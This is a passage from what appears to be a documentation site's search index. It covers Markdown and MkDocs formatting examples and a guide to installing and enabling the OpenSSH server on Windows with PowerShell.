Page 1 Rest Introduction Page 2 Folder Introduction Page 3 Page 4 Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only files named introduction.md
.
nav:\n- Introductions:\n- ... | **/introduction.md\n- ...\n
With the following result:
Introductions Introduction Introduction Page 1 Page 2 Folder Note: The pattern is checked against the path relative to the docs directory.
For more details refer to the Rest Filter Patterns section below.
By default, remaining items keep their hierarchical structure. You may add flat
to flatten all the matching pages:
nav:\n- page1.md\n- Rest:\n- ... | flat | **/introduction.md\n- ... | flat\n
Page 1 Rest Introduction Introduction Page 2 Page 3 Page 4
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#rest-filter-patterns", "title": "Rest Filter Patterns", "text": "In all places where the rest entry (...
) is allowed, you can also include a glob pattern or regular expression to filter the items to be displayed.
nav:\n- ... | page-*.md\n- ... | regex=page-[0-9]+.md\n
The filter only operates on remaining items. This means it will not include items that are explicitly listed in the navigation or items that are matched by another filter that appears earlier in the configuration.
You may also include a rest entry without filter to act as a catch-all, inserting everything that is not matched by a filter.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#syntax-details", "title": "Syntax Details", "text": "Unless the filter starts with regex=
it is interpreted as glob pattern, however you may also explicitly say so using glob=
. The spaces around ...
are optional but recommended for readability.
Note: Depending on the characters in your filter, you might also need to use quotes around the whole entry.
nav:\n# equivalent glob entries\n- ... | page-*.md\n- ... | glob=page-*.md\n- ...|page-*.md\n- '... | page-*.md'\n\n# equivalent regex entries\n- ... | regex=page-[0-9]+.md\n- ...|regex=page-[0-9]+.md\n- '... | regex=page-[0-9]+.md'\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#options", "title": "Options", "text": "You may customize the plugin by passing options in mkdocs.yml
:
plugins:\n- awesome-pages:\nfilename: .index\ncollapse_single_pages: true\nstrict: false\norder: asc\nsort_type: natural\norder_by: title\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#filename", "title": "filename
", "text": "Name of the file used to configure pages of a directory. Default is .pages
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#collapse_single_pages", "title": "collapse_single_pages
", "text": "Enable the collapsing of single nested pages. Default is false
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#strict", "title": "strict
", "text": "Raise errors instead of warnings when:
arrange
entries cannot be found nav
entries cannot be found Default is true
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#order-sort_type-and-order_by", "title": "order
, sort_type
and order_by
", "text": "Global fallback values for the Meta attributes. Default is None
or filename
.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/", "title": "Markdown Basic Formatting", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#text-styling", "title": "Text Styling", "text": "Markdown makes it easy to format messages. Type a message as you normally would, then use these the following formatting syntax to render the message a specific way
Markdown Syntax Result **bold**
bold _italic_
italic ==highlight==
highlight ~~strike through~~
strike through ^^underline^^
underline `Inline Code`
Inline Code
==_you_ **can** ^^combine^^ `too`==
you can combine too
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#horizontal-line", "title": "Horizontal Line", "text": "Horizontal Line ExampleHorizontal line\n\n---\n\nThree consecutive dashes\n
Result:
Horizontal line
Three consecutive dashes
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading", "title": "Heading", "text": "To create a heading, add number signs (#) in front of a word or phrase. The number of number signs you use should correspond to the heading level. For example, to create a heading level three (h3), use three number signs (e.g., ### My Header).
Headings from h1
through h6
are constructed with a #
for each level:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#regular-headings", "title": "Regular Headings", "text": "Regular Headings (h1-h6)### Heading 3\n\n#### Heading 4\n\n##### Heading 5\n\n###### Heading 6\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-3", "title": "Heading 3", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-4", "title": "Heading 4", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-5", "title": "Heading 5", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-6", "title": "Heading 6", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#headings-with-secondary-text", "title": "Headings with secondary text", "text": "Headings with secondary text (h1-h6)### Heading 3 <small>with secondary text</small>\n\n#### Heading 4 <small>with secondary text</small>\n\n##### Heading 5 <small>with secondary text</small>\n\n###### Heading 5 <small>with secondary text</small>\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-3-with-secondary-text", "title": "Heading 3 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-4-with-secondary-text", "title": "Heading 4 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-5-with-secondary-text", "title": "Heading 5 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-6-with-secondary-text", "title": "Heading 6 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/", "title": "Markdown Code Blocks", "text": "Code blocks and examples are an essential part of technical project documentation. Material for MkDocs provides different ways to set up syntax highlighting for code blocks, either during build time using [Pygments] or during runtime using a JavaScript syntax highlighter.
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#adding-a-title", "title": "Adding a Title", "text": "In order to provide additional context, a custom title can be added to a code block by using the title=\"<custom title>\"
option directly after the shortcode, e.g. to display the name of a file:
Example:
Code block with title```py title=\"bubble_sort.py\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
bubble_sort.pydef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#adding-line-numbers-to-code-block", "title": "Adding Line Numbers To Code Block", "text": "Example:
Line numbers can be added to a code block by using the linenums=\"<start>\"
option directly after the shortcode, whereas <start>
represents the starting line number. A code block can start from a line number other than 1
, which allows to split large code blocks for readability:
Code block with line numbers```py linenums=\"1\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
def bubble_sort(items):\nfor i in range(len(items)):\nfor j in range(len(items) - 1 - i):\nif items[j] > items[j + 1]:\nitems[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#highlighting-specific-lines", "title": "Highlighting Specific Lines", "text": "Specific lines can be highlighted by passing the line numbers to the hl_lines
argument placed right after the language shortcode. Note that line counts start at 1
.
Code block with highlighted lines```py hl_lines=\"2 3\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
def bubble_sort(items):\nfor i in range(len(items)):\nfor j in range(len(items) - 1 - i):\nif items[j] > items[j + 1]:\nitems[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#highlighting-inline-code-blocks", "title": "Highlighting Inline Code Blocks", "text": "When InlineHilite
is enabled, syntax highlighting can be applied to inline code blocks by prefixing them with a shebang, i.e. #!
, directly followed by the corresponding language shortcode
Example:
Inline code blockThe `#!python range()` function is used to generate a sequence of numbers.\n
Result:
The range()
function is used to generate a sequence of numbers.
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/", "title": "Markdown Content Tabs", "text": "Sometimes, it's desirable to group alternative content under different tabs, e.g. when describing how to access an API from different languages or environments. Material for MkDocs allows for beautiful and functional tabs, grouping code blocks and other content.
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#usage", "title": "Usage", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#grouping-code-blocks", "title": "Grouping code blocks", "text": "Code blocks are one of the primary targets to be grouped, and can be considered a special case of content tabs, as tabs with a single code block are always rendered without horizontal spacing:
Example:
Content tabs with code blocks=== \"C\"\n\n ``` c\n #include <stdio.h>\n\n int main(void) {\n printf(\"Hello world!\\n\");\n return 0;\n }\n ```\n\n=== \"C++\"\n\n ``` c++\n #include <iostream>\n\n int main(void) {\n std::cout << \"Hello world!\" << std::endl;\n return 0;\n }\n ```\n
Result:
CC++ #include <stdio.h>\n\nint main(void) {\nprintf(\"Hello world!\\n\");\nreturn 0;\n}\n
#include <iostream>\n\nint main(void) {\nstd::cout << \"Hello world!\" << std::endl;\nreturn 0;\n}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#grouping-other-content", "title": "Grouping other content", "text": "When a content tab contains more than one code block, it is rendered with horizontal spacing. Vertical spacing is never added, but can be achieved by nesting tabs in other blocks:
Example:
Content tabs=== \"Unordered list\"\n\n * Sed sagittis eleifend rutrum\n * Donec vitae suscipit est\n * Nulla tempor lobortis orci\n\n=== \"Ordered list\"\n\n 1. Sed sagittis eleifend rutrum\n 2. Donec vitae suscipit est\n 3. Nulla tempor lobortis orci\n
Result:
Unordered listOrdered list Sed sagittis eleifend rutrum Donec vitae suscipit est Nulla tempor lobortis orci Sed sagittis eleifend rutrum Donec vitae suscipit est Nulla tempor lobortis orci ", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#embedded-content", "title": "Embedded content", "text": "When [SuperFences] is enabled, content tabs can contain arbitrary nested content, including further content tabs, and can be nested in other blocks like [admonitions] or blockquotes:
Example:
Content tabs in admonition!!! example\n\n === \"Unordered List\"\n\n ``` markdown\n * Sed sagittis eleifend rutrum\n * Donec vitae suscipit est\n * Nulla tempor lobortis orci\n ```\n\n === \"Ordered List\"\n\n ``` markdown\n 1. Sed sagittis eleifend rutrum\n 2. Donec vitae suscipit est\n 3. Nulla tempor lobortis orci\n ```\n
Result:
Example
Unordered ListOrdered List * Sed sagittis eleifend rutrum\n* Donec vitae suscipit est\n* Nulla tempor lobortis orci\n
1. Sed sagittis eleifend rutrum\n2. Donec vitae suscipit est\n3. Nulla tempor lobortis orci\n
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/diagrams/", "title": "Mermaid Diagrams", "text": "Diagrams help to communicate complex relationships and interconnections between different technical components, and are a great addition to project documentation. Material for MkDocs integrates with Mermaid.js, a very popular and flexible solution for drawing diagrams.
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#usage", "title": "Usage", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-flowcharts", "title": "Using Flowcharts", "text": "Flowcharts are diagrams that represent workflows or processes. The steps are rendered as nodes of various kinds and are connected by edges, describing the necessary order of steps:
Flow chart```mermaid\ngraph LR\n A[Start] --> B{Error?};\n B -->|Yes| C[Hmm...];\n C --> D[Debug];\n D --> B;\n B ---->|No| E[Yay!];\n```\n
Result:
graph LR\n A[Start] --> B{Error?};\n B -->|Yes| C[Hmm...];\n C --> D[Debug];\n D --> B;\n B ---->|No| E[Yay!];
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-sequence-diagrams", "title": "Using Sequence Diagrams", "text": "Sequence diagrams describe a specific scenario as sequential interactions between multiple objects or actors, including the messages that are exchanged between those actors:
Sequence diagram```mermaid\nsequenceDiagram\n Alice->>John: Hello John, how are you?\n loop Healthcheck\n John->>John: Fight against hypochondria\n end\n Note right of John: Rational thoughts!\n John-->>Alice: Great!\n John->>Bob: How about you?\n Bob-->>John: Jolly good!\n```\n
Result:
sequenceDiagram\n Alice->>John: Hello John, how are you?\n loop Healthcheck\n John->>John: Fight against hypochondria\n end\n Note right of John: Rational thoughts!\n John-->>Alice: Great!\n John->>Bob: How about you?\n Bob-->>John: Jolly good!
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-state-diagrams", "title": "Using State Diagrams", "text": "State diagrams are a great tool to describe the behavior of a system, decomposing it into a finite number of states, and transitions between those states:
State diagram```mermaid\nstateDiagram-v2\n state fork_state <<fork>>\n [*] --> fork_state\n fork_state --> State2\n fork_state --> State3\n\n state join_state <<join>>\n State2 --> join_state\n State3 --> join_state\n join_state --> State4\n State4 --> [*]\n```\n
Result:
stateDiagram-v2\n state fork_state <<fork>>\n [*] --> fork_state\n fork_state --> State2\n fork_state --> State3\n\n state join_state <<join>>\n State2 --> join_state\n State3 --> join_state\n join_state --> State4\n State4 --> [*]
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-class-diagrams", "title": "Using Class Diagrams", "text": "Class diagrams are central to object oriented programing, describing the structure of a system by modelling entities as classes and relationships between them:
Class diagram```mermaid\nclassDiagram\n Person <|-- Student\n Person <|-- Professor\n Person : +String name\n Person : +String phoneNumber\n Person : +String emailAddress\n Person: +purchaseParkingPass()\n Address \"1\" <-- \"0..1\" Person:lives at\n class Student{\n +int studentNumber\n +int averageMark\n +isEligibleToEnrol()\n +getSeminarsTaken()\n }\n class Professor{\n +int salary\n }\n class Address{\n +String street\n +String city\n +String state\n +int postalCode\n +String country\n -validate()\n +outputAsLabel()\n }\n```\n
Result:
classDiagram\n Person <|-- Student\n Person <|-- Professor\n Person : +String name\n Person : +String phoneNumber\n Person : +String emailAddress\n Person: +purchaseParkingPass()\n Address \"1\" <-- \"0..1\" Person:lives at\n class Student{\n +int studentNumber\n +int averageMark\n +isEligibleToEnrol()\n +getSeminarsTaken()\n }\n class Professor{\n +int salary\n }\n class Address{\n +String street\n +String city\n +String state\n +int postalCode\n +String country\n -validate()\n +outputAsLabel()\n }
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-entity-relationship-diagrams", "title": "Using Entity-Relationship Diagrams", "text": "An entity-relationship diagram is composed of entity types and specifies relationships that exist between entities. It describes inter-related things in a specific domain of knowledge:
Entity-relationship diagram```mermaid\nerDiagram\n CUSTOMER ||--o{ ORDER : places\n ORDER ||--|{ LINE-ITEM : contains\n CUSTOMER }|..|{ DELIVERY-ADDRESS : uses\n```\n
Result:
erDiagram\n CUSTOMER ||--o{ ORDER : places\n ORDER ||--|{ LINE-ITEM : contains\n CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/", "title": "Embed External Markdown", "text": "MkDocs Embed External Markdown plugin that allows to inject section or full markdown content from a given url. The goal is to embed different markdown from different sources inside your MkDocs project.
For more detailed inforation follow the link: Mkdocs Embed External Markdown Plugin
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#usage", "title": "Usage", "text": " Section defined by \"##/###/####...\" header (h2/h3/h4...) \"#\" header (h1) will be removed from source content so you can use use your own header \"##/###/####...\" header (h2/h3/h4...) will be removed from source section content so you can use use your own header Supports multiple sections from any source external_markdown
requires 2 parameters: url and section name.
{{ external_markdown('url', '## section name') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#full-markdown-content", "title": "Full Markdown Content", "text": "Embed full markdown content from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#specific-section", "title": "Specific Section", "text": "Embed markdown section from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '## Installation') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/icons/", "title": "Icons & Emojis", "text": "One of the best features of Material for MkDocs is the possibility to use more then with thousands of emojis in your project documentation with practically zero additional effort. Use Mkdocs Material Icon Search to find the icons and emojis you need.
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/icons/#usage", "title": "Usage", "text": "Example:
:fontawesome-regular-bell: - Fontawesome Icon: Bell \n:material-bell: - Material Icon: Bell \n:octicons-bell-24: - Octicons Icon: Bell \n:bell: - Emoji: Bell\n
Result:
- Fontawesome Icon: Bell - Material Icon: Bell - Octicons Icon: Bell - Emoji: Bell
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/icons/#keyboard-keys-icons", "title": "Keyboard Keys Icons", "text": "Example:
++ctrl+alt+del++\n
++cmd+control+option++\n
Result:
Ctrl+Alt+Del
Cmd+Ctrl+Option
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/images/", "title": "Markdown Images", "text": "Markdown is a text format so naturally you can type in the Markdown representation of an image using examples below to put an image reference directly into the editor.
Warning
This site uses the Material Design for MkDocs theme with the following CSS overrides there for the results in your case may differ.
Custom css /* images css */\n.md-typeset img {\nborder-radius: 5px;\nheight: auto;\nmax-width: 95%;\nmargin: auto;\ndisplay: block;\nbox-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;\n}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/images/#embedding-images", "title": "Embedding Images", "text": "Internal soruce example![minion][internal-source]\n\n[internal-source]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'\n
External source example![minion][external-source]\n\n[external-source]: https://octodex.github.com/images/minion.png 'Title of the image'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/images/#embedding-images-with-width-attributes", "title": "Embedding Images With Width Attributes", "text": "width=200 example![minion][internal-source]{: style=\"width:200px\"}\n\n[internal-source]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/links/", "title": "Markdown Links", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#link-with-title", "title": "Link With Title", "text": "Link with Title Example[My Github Page][github-url]\n\n[github-url]: https://github.com/fire1ce 'Title of the link'\n
Result:
My Github Page
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#open-in-new-tab", "title": "Open In New Tab", "text": "Append (target=\\_blank)
to the end of the link.
Open In New Tab Link Example[My Github Page][github-url]{target=\\_blank}\n\n[github-url]: https://github.com/fire1ce 'Title of the link'\n
Result:
My Github Page
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#internal-anchor-links", "title": "Internal Anchor Links", "text": "Internal Anchor Links Example[Jumps to section in page][internal-anchor-link]\n\n[internal-anchor-link]: /utilities/markdown-cheatsheet/tables-lists-quotes/#lists 'Internal Anchor Links'\n
Result:
Jumps to section in page
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#image-with-links", "title": "Image With Links", "text": "Image With Links Example[![This is Image with link][image-link]][url-link]{target=\\_blank}\n\n[image-link]: /assets/images/markdown-cheatsheet/minion200x200.png 'Minion'\n[url-link]: https://github.com/fire1ce 'Go to Github'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#mailto-link", "title": "Mailto
Link", "text": "Mailto Link Example[Send Email][mail-to-link]\n\n[mail-to-link]: mailto:example@example.com 'Send Email'\n
Result:
Send Email
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/", "title": "Tables, Lists and Quotes", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#tables", "title": "Tables", "text": "A table in Markdown consists of two parts: the header and the rows of data in the table. As per the Markdown spec:
pipe (|) character separates the individual columns in a table. (-) hyphens act as a delimiter row to separate the header row from the body. (:) colon to align cell contents. Table Example| **Option** | **Description** |\n| ---------- | ------------------------------------------ |\n| data | path to data files to supply the data. |\n| engine | engine to be used for processing templates |\n| ext | extension to be used for dest files. |\n
Result:
Option Description data path to data files to supply the data. engine engine to be used for processing templates ext extension to be used for dest files.", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#column-alignment", "title": "Column Alignment", "text": "If you want to align a specific column to the left
, center
or right
, you can use the [regular Markdown syntax] placing :
characters at the beginning and/or end of the divider.
LeftCenterRight Data table, columns aligned to left| Method | Description |\n| :---------- | :----------------------------------- |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource Data table, columns centered| Method | Description |\n| :---------: | :----------------------------------: |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource Data table, columns aligned to right| Method | Description |\n| ----------: | -----------------------------------: |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#lists", "title": "Lists", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#unordered-list", "title": "Unordered List", "text": "Bullet point lists can be created by starting each line with an asterisk followed by a space before the content of the bullet point. Note that the space is important and should not be forgotten.
Example:
Unordered List Example- Lorem ipsum dolor sit amet\n- Consectetur adipiscing elit\n- Integer molestie lorem at massa\n- Facilisis in pretium nisl aliquet\n
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Facilisis in pretium nisl aliquet ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#ordered-list", "title": "Ordered List", "text": "Similarly, numbered lists can be created by starting each line with a number followed by a space and then the relevant text.
Ordered List Example1. Lorem ipsum dolor sit amet\n2. Consectetur adipiscing elit\n3. Integer molestie lorem at massa\n4. Faucibus porta lacus fringilla vel\n5. Aenean sit amet erat nunc\n6. Eget porttitor lorem\n
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Faucibus porta lacus fringilla vel Aenean sit amet erat nunc Eget porttitor lorem ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#blocks-list", "title": "Blocks List", "text": "Blocks List Example> - list under lists\n> - under lists\n
Result:
list under lists under lists ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#tasklists", "title": "Tasklists", "text": "A task list is a set of tasks that each render on a separate line with a clickable checkbox. You can select or deselect the checkboxes to mark the tasks as complete or incomplete.
You can use Markdown to create a task list in any comment on GitHub. If you reference an issue, pull request, or discussion in a task list, the reference will unfurl to show the title and state.
Example:
Task List Example- [x] Lorem ipsum dolor sit amet, consectetur adipiscing elit\n- [ ] Vestibulum convallis sit amet nisi a tincidunt\n - [x] In hac habitasse platea dictumst\n - [x] In scelerisque nibh non dolor mollis congue sed et metus\n - [ ] Praesent sed risus massa\n- [ ] Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit Vestibulum convallis sit amet nisi a tincidunt In hac habitasse platea dictumst In scelerisque nibh non dolor mollis congue sed et metus Praesent sed risus massa Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#block-quotes", "title": "Block Quotes", "text": "For quoting blocks of content from another source within your document.
Add >
before any text you want to quote.
Quoting Blocks Example> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.\n> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#nested-block-quotes", "title": "Nested Block Quotes", "text": "Quoting Blocks Nested Example> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.\n> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.\n>\n> > Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio\n> > non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "windows/ssh-server/", "title": "Windows SSH Server", "text": "Sometime you need to connect to a remote server via SSH
. Usually it's the main connection to linux servers. But you can also connect to a windows server via SSH
. At this guide we will show you how to install and configure a windows ssh server, including SSH Keys authentication
.
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#ssh-server-installation-on-windows", "title": "SSH Server Installation on Windows", "text": "We will be using PowerShell to install the SSH server inculding the SSH client.
Open PowerShell Terminal as Administrator.
Run the following commands to install the SSH server and client.
Add-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0\nAdd-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0\n
After the installaton you can check the Windows SSH server and client are installed.
Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'\n
The output will be something like this:
To start the Windows SSH server service
Start-Service sshd\n
Enable Windows SSH Server on Windows Boot
Set-Service -Name sshd -StartupType 'Automatic'\n
Add a Firewall rule to allow the SSH port
if (!(Get-NetFirewallRule -Name \"OpenSSH-Server-In-TCP\" -ErrorAction SilentlyContinue | Select-Object Name, Enabled)) { Write-Output \"Firewall Rule 'OpenSSH-Server-In-TCP' does not exist, creating it...\" New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output \"Firewall rule 'OpenSSH-Server-In-TCP' has been created and exists.\" }\n
At this point you should be able to connect via SSH to the Windows server with your username and password.
